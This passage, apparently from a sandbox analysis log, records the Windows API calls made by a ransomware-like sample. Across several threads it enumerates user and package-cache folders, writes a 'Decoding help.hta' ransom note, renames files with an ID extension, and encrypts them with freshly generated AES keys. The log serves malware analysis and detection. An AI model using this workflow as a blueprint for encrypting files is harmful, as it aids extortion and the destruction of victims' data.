Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa68 [0058.287] CreateFileMappingA (hFile=0xa68, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa6c [0058.287] CryptAcquireContextA (in: phProv=0xe68fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe68fcec*=0x3448cf8) returned 1 [0060.193] CryptGenKey (in: hProv=0x3448cf8, Algid=0x6610, dwFlags=0x1, phKey=0xe68fce8 | out: phKey=0xe68fce8*=0x42cf658) returned 1 [0060.193] CryptExportKey (in: hKey=0x42cf658, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe68fbe4, pdwDataLen=0xe68fce4 | out: pbData=0xe68fbe4*, pdwDataLen=0xe68fce4*=0x2c) returned 1 [0060.193] MapViewOfFile (hFileMappingObject=0xa6c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfc900) returned 0xc420000 [0063.878] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe68fbe4*, pdwDataLen=0xe68fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe68fbe4*, pdwDataLen=0xe68fcf8*=0x100) returned 1 [0063.879] CryptEncrypt (hKey=0x42cf658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xc420000, pdwDataLen=0xe68fce4*=0xfc900, dwBufLen=0xfc900) Thread: id = 774 os_tid = 0xa54 [0054.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671c70 [0056.118] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.118] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.118] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.118] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.118] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aae6600, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x8aae6600, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x8aae6600, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.118] lstrcpyW (in: lpString1=0x42907a8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*" [0056.118] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*") returned 123 [0056.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0056.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0xffffffff [0056.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 775 os_tid = 0xa60 [0054.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*", lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671830 [0056.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.129] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.129] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.129] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 1 [0056.129] lstrcmpW (lpString1=".", lpString2="CJW3O3KP.BX7") returned -1 [0056.129] lstrcmpW (lpString1="..", lpString2="CJW3O3KP.BX7") returned -1 [0056.129] lstrcmpiW (lpString1="windows", lpString2="CJW3O3KP.BX7") returned 1 [0056.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*" [0056.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*") returned 65 [0056.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\", lpString2="CJW3O3KP.BX7" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7" [0056.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*" [0056.129] GlobalMemoryStatus (in: lpBuffer=0xe78fd10 | out: lpBuffer=0xe78fd10) [0056.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25147988, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0056.579] CloseHandle (hObject=0x7ac) returned 1 [0056.579] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 0 [0056.579] FindClose (in: hFindFile=0x671830 | out: hFindFile=0x671830) returned 1 Thread: id = 776 os_tid = 0x86c [0054.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*", lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8590 [0055.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.492] FindNextFileW (in: hFindFile=0x5d8590, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.493] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.493] FindNextFileW (in: hFindFile=0x5d8590, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0055.493] lstrcpyW (in: lpString1=0x10f5f3e8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0055.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned 89 [0055.493] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" [0055.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\decoding help.hta")) returned 0xffffffff [0055.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbb8 [0058.392] WriteFile (in: hFile=0xbb8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x124dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x124dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.393] CloseHandle (hObject=0xbb8) returned 1 [0058.394] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.394] lstrcmpiW (lpString1="Decoding help.hta", lpString2="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 1 [0058.394] lstrlenW (lpString="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 65 [0058.394] lstrcmpiW (lpString1="[ID]", lpString2="D91B") returned -1 [0058.394] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0058.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned 89 [0058.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" [0058.394] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" [0058.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]" [0058.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 777 os_tid = 0xa6c [0054.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*", lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0056.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.128] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.128] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.128] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 1 [0056.128] lstrcmpW (lpString1=".", lpString2="YVORLGOR.PNT") returned -1 [0056.128] lstrcmpW (lpString1="..", lpString2="YVORLGOR.PNT") returned -1 [0056.128] lstrcmpiW (lpString1="windows", lpString2="YVORLGOR.PNT") returned -1 [0056.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*" [0056.128] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*") returned 73 [0056.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\", lpString2="YVORLGOR.PNT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT" [0056.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*" [0056.128] GlobalMemoryStatus (in: lpBuffer=0x164dfd10 | out: lpBuffer=0x164dfd10) [0056.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9581ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0056.488] CloseHandle (hObject=0x7ac) returned 1 [0056.488] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 0 [0056.488] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 778 os_tid = 0xa68 [0054.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*", lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e50 [0055.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.493] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, 